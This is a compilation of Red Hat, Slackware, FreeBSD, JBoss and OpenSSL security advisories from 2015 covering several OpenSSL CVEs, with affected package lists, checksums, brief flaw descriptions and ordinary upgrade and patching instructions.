x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-42.el6_7.1.src.rpm
i386: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm
ppc64: openssl-1.0.1e-42.el6_7.1.ppc.rpm openssl-1.0.1e-42.el6_7.1.ppc64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.ppc.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm openssl-devel-1.0.1e-42.el6_7.1.ppc.rpm openssl-devel-1.0.1e-42.el6_7.1.ppc64.rpm
s390x: openssl-1.0.1e-42.el6_7.1.s390.rpm openssl-1.0.1e-42.el6_7.1.s390x.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.s390.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm openssl-devel-1.0.1e-42.el6_7.1.s390.rpm openssl-devel-1.0.1e-42.el6_7.1.s390x.rpm
x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-perl-1.0.1e-42.el6_7.1.i686.rpm openssl-static-1.0.1e-42.el6_7.1.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm openssl-perl-1.0.1e-42.el6_7.1.ppc64.rpm openssl-static-1.0.1e-42.el6_7.1.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm openssl-perl-1.0.1e-42.el6_7.1.s390x.rpm openssl-static-1.0.1e-42.el6_7.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-42.el6_7.1.src.rpm
i386: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm
x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-perl-1.0.1e-42.el6_7.1.i686.rpm openssl-static-1.0.1e-42.el6_7.1.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.1.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.1.i686.rpm openssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.1.i686.rpm openssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-static-1.0.1e-51.el7_2.1.i686.rpm openssl-static-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.1.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.1.i686.rpm openssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.1.i686.rpm openssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-static-1.0.1e-51.el7_2.1.i686.rpm openssl-static-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.1.src.rpm
aarch64: openssl-1.0.1e-51.el7_2.1.aarch64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm openssl-devel-1.0.1e-51.el7_2.1.aarch64.rpm openssl-libs-1.0.1e-51.el7_2.1.aarch64.rpm
ppc64: openssl-1.0.1e-51.el7_2.1.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.1.ppc.rpm openssl-devel-1.0.1e-51.el7_2.1.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.1.ppc.rpm openssl-libs-1.0.1e-51.el7_2.1.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.1.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.1.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm openssl-devel-1.0.1e-51.el7_2.1.s390.rpm openssl-devel-1.0.1e-51.el7_2.1.s390x.rpm openssl-libs-1.0.1e-51.el7_2.1.s390.rpm openssl-libs-1.0.1e-51.el7_2.1.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.1.i686.rpm openssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.1.i686.rpm openssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: openssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm openssl-perl-1.0.1e-51.el7_2.1.aarch64.rpm openssl-static-1.0.1e-51.el7_2.1.aarch64.rpm
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.1.ppc64.rpm openssl-static-1.0.1e-51.el7_2.1.ppc.rpm openssl-static-1.0.1e-51.el7_2.1.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.1.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm openssl-perl-1.0.1e-51.el7_2.1.s390x.rpm openssl-static-1.0.1e-51.el7_2.1.s390.rpm openssl-static-1.0.1e-51.el7_2.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-static-1.0.1e-51.el7_2.1.i686.rpm openssl-static-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.1.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.1.i686.rpm openssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.1.i686.rpm openssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-static-1.0.1e-51.el7_2.1.i686.rpm openssl-static-1.0.1e-51.el7_2.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-3194 https://access.redhat.com/security/cve/CVE-2015-3195 https://access.redhat.com/security/cve/CVE-2015-3196 https://access.redhat.com/security/updates/classification/#moderate https://openssl.org/news/secadv/20151203.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWblodXlSAg2UNWIIRAt6yAKCw1yHbcUPDEPeokS22dMKyo6YFsQCgmPe4 dpIS/iR9oiOKMXJY5t447ME= =qvLr -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz: Upgraded. Anon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794). For more information, see: https://openssl.org/news/secadv_20151203.txt https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1794 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3193 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3194 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3195 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3196 ( Security fix ) patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zh-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zh-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zh-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1q-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1q-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1q-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2e-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2e-i586-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2e-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2e-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 5e45a22283b41aaf4f867918746ebc1d openssl-0.9.8zh-i486-1_slack13.0.txz 0ad74b36ce143d28e15dfcfcf1fcb483 openssl-solibs-0.9.8zh-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: c360d323a2bed57c62d6699b2d4be65e openssl-0.9.8zh-x86_64-1_slack13.0.txz 122240badbfbe51c842a9102d3cfe30f openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 1bf98b27573b20a7de5f6359f3eadbd7 openssl-0.9.8zh-i486-1_slack13.1.txz 2b732f1f29de1cb6078fd1ddda8eb9ec openssl-solibs-0.9.8zh-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: 735c3bbc55902ec57e46370cde32ea4b openssl-0.9.8zh-x86_64-1_slack13.1.txz 483f506f3b86572e60fe4c46a67c226b openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 9af41ba336c64b92d5bbd86c17a93e94 openssl-0.9.8zh-i486-1_slack13.37.txz b83170b9c5ec56b4e2dc882b3c64b306 openssl-solibs-0.9.8zh-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 2220ff161d0bf3635d2dea7caae6e5e7 openssl-0.9.8zh-x86_64-1_slack13.37.txz 17b3e8884f383e3327d5e4a6080634cb openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz
Slackware 14.0 packages: ced42bc3799f2b54aeb3b631a2864b90 openssl-1.0.1q-i486-1_slack14.0.txz 52965f98ee30e8f3d22bde6b0fe7f53b openssl-solibs-1.0.1q-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: cbf49f09bdcebc61cf7fcb2857dc3a71 openssl-1.0.1q-x86_64-1_slack14.0.txz 156911f58b71ee6369467d8fec34a59f openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 36d5f60b634788d4315ffb46ef6d4d88 openssl-1.0.1q-i486-1_slack14.1.txz fc18f566a9a2f5c6adb15d288245403a openssl-solibs-1.0.1q-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: 03f1832417a79f73b35180a39ae4fb16 openssl-1.0.1q-x86_64-1_slack14.1.txz bf447792f23deb14e1fe3f008a6b78a7 openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz
Slackware -current packages: 27b2974199a970392ed2192bf4a207a9 a/openssl-solibs-1.0.2e-i586-1.txz 940a7653a6cadb44ce143d3b0e0eaa16 n/openssl-1.0.2e-i586-1.txz
Slackware x86_64 -current packages: 8636a45f49d186d505b356b9be66309b a/openssl-solibs-1.0.2e-x86_64-1.txz 87c33a76a94993864a52bfe4e5d5b2f0 n/openssl-1.0.2e-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1q-i486-1_slack14.1.txz openssl-solibs-1.0.1q-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. Corrected: 2015-12-03 21:18:48 UTC (stable/10, 10.2-STABLE) 2015-12-05 09:53:58 UTC (releng/10.2, 10.2-RELEASE-p8) 2015-12-05 09:53:58 UTC (releng/10.1, 10.1-RELEASE-p25) 2015-12-03 21:24:40 UTC (stable/9, 9.3-STABLE) 2015-12-05 09:53:58 UTC (releng/9.3, 9.3-RELEASE-p31) CVE Name: CVE-2015-3194, CVE-2015-3195, CVE-2015-3196
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
FreeBSD includes software from the OpenSSL Project.
II. [CVE-2015-3196]
III. [CVE-2015-3194] This affects FreeBSD 10.x only. [CVE-2015-3196]. This affects FreeBSD 10.1 only.
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
Reboot is optional but recommended.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
Reboot is optional but recommended.
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 9.3]
fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-9.3.patch
fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-9.3.patch.asc
gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.1]
fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-10.1.patch
fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-10.1.patch.asc
gpg --verify openssl-10.1.patch.asc
[FreeBSD 10.2]
fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-10.2.patch
fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-10.2.patch.asc
gpg --verify openssl-10.2.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart all deamons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/9/ r291722 releng/9.3/ r291854 stable/10/ r291721 releng/10.1/ r291854 releng/10.2/ r291854
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. Description:
This release of Red Hat JBoss Core Services httpd 2.4.23 serves as a replacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2014-8176, CVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2177, CVE-2016-2178, CVE-2016-2842)
-
This update fixes several flaws in libxml2. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
-
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
-
This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)
-
This update fixes two flaws in mod_cluster. (CVE-2016-4459, CVE-2016-8612)
-
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2012-1148)
Red Hat would like to thank the OpenSSL project for reporting CVE-2014-8176, CVE-2015-0286, CVE-2016-2108, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842. Upstream acknowledges Stephen Henson (OpenSSL development team) as the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat), Hanno BAPck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105, CVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj Somorovsky as the original reporter of CVE-2016-2107; Yuval Yarom (University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv University), and Nadia Heninger (University of Pennsylvania) as the original reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as the original reporter of CVE-2016-0705.
See the corresponding CVE pages linked to in the References section for more information about each of the flaws listed in this advisory. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):
801648 - CVE-2012-1148 expat: Memory leak in poolGrow 1121519 - CVE-2014-3523 httpd: WinNT MPM denial of service 1196737 - CVE-2015-0209 openssl: use-after-free on invalid EC private key import 1202366 - CVE-2015-0286 openssl: invalid pointer use in ASN1_TYPE_cmp() 1227574 - CVE-2015-3216 openssl: Crash in ssleay_rand_bytes due to locking regression 1228611 - CVE-2014-8176 OpenSSL: Invalid free in DTLS 1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4 1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter 1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak 1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint 1310596 - CVE-2016-0705 OpenSSL: Double-free in DSA code 1310599 - CVE-2016-0702 OpenSSL: Side channel attack on modular exponentiation 1311880 - CVE-2016-0797 OpenSSL: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption 1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions 1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds 1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode 1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data 1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder 1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check 1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow 1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow 1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file 1332820 - CVE-2016-4483 libxml2: out-of-bounds read 1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar 1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName 1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs 1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral 1338700 - CVE-2016-4448 libxml2: Format string vulnerability 1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content 1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey 1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString 1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal 1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup 1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat 1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar 1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute 1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1362183 - CVE-2016-5419 curl: TLS session resumption client cert bypass 1362190 - CVE-2016-5420 curl: Re-using connection with wrong client cert 1373229 - CVE-2016-7141 curl: Incorrect reuse of client certificates 1382352 - CVE-2016-6808 mod_jk: Buffer overflow when concatenating virtual host name and URI 1387605 - CVE-2016-8612 JBCS mod_cluster: Protocol parsing logic error
- JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
NOTE: WE ANTICIPATE THAT 1.0.0t AND 0.9.8zh WILL BE THE LAST RELEASES FOR THE 0.9.8 AND 1.0.0 VERSIONS AND THAT NO MORE SECURITY FIXES WILL BE PROVIDED (AS PER PREVIOUS ANNOUNCEMENTS). USERS ARE ADVISED TO UPGRADE TO LATER VERSIONS.
BN_mod_exp may produce incorrect results on x86_64 (CVE-2015-3193)
Severity: Moderate
There is a carry propagating bug in the x86_64 Montgomery squaring procedure. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. An attacker would additionally need online access to an unpatched system using the target private key in a scenario with persistent DH parameters and a private key that is shared between multiple clients. For example this can occur by default in OpenSSL DHE based SSL/TLS ciphersuites.
This issue affects OpenSSL version 1.0.2.
OpenSSL 1.0.2 users should upgrade to 1.0.2e
This issue was reported to OpenSSL on August 13 2015 by Hanno Böck. The fix was developed by Andy Polyakov of the OpenSSL development team. Since these routines are used to verify certificate signature algorithms this can be used to crash any certificate verification operation and exploited in a DoS attack.
This issue affects OpenSSL versions 1.0.2 and 1.0.1.
OpenSSL 1.0.2 users should upgrade to 1.0.2e OpenSSL 1.0.1 users should upgrade to 1.0.1q
This issue was reported to OpenSSL on August 27 2015 by Loïc Jonas Etienne (Qnective AG). The fix was developed by Dr. Stephen Henson of the OpenSSL development team. This structure is used by the PKCS#7 and CMS routines so any application which reads PKCS#7 or CMS data from untrusted sources is affected. SSL/TLS is not affected.
This issue affects OpenSSL versions 1.0.2 and 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.2 users should upgrade to 1.0.2e OpenSSL 1.0.1 users should upgrade to 1.0.1q OpenSSL 1.0.0 users should upgrade to 1.0.0t OpenSSL 0.9.8 users should upgrade to 0.9.8zh
This issue was reported to OpenSSL on November 9 2015 by Adam Langley (Google/BoringSSL) using libFuzzer. The fix was developed by Dr. Stephen Henson of the OpenSSL development team.
Race condition handling PSK identify hint (CVE-2015-3196)
Severity: Low
If PSK identity hints are received by a multi-threaded client then the values are wrongly updated in the parent SSL_CTX structure.
This issue was fixed in OpenSSL 1.0.2d and 1.0.1p but has not been previously listed in an OpenSSL security advisory. This issue also affects OpenSSL 1.0.0 and has not been previously fixed in an OpenSSL 1.0.0 release.
The fix was developed by Dr. Stephen Henson of the OpenSSL development team.
Anon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794)
Severity: Low
If a client receives a ServerKeyExchange for an anonymous DH ciphersuite with the value of p set to 0 then a seg fault can occur leading to a possible denial of service attack.
This issue affects OpenSSL version 1.0.2.
OpenSSL 1.0.2 users should upgrade to 1.0.2e
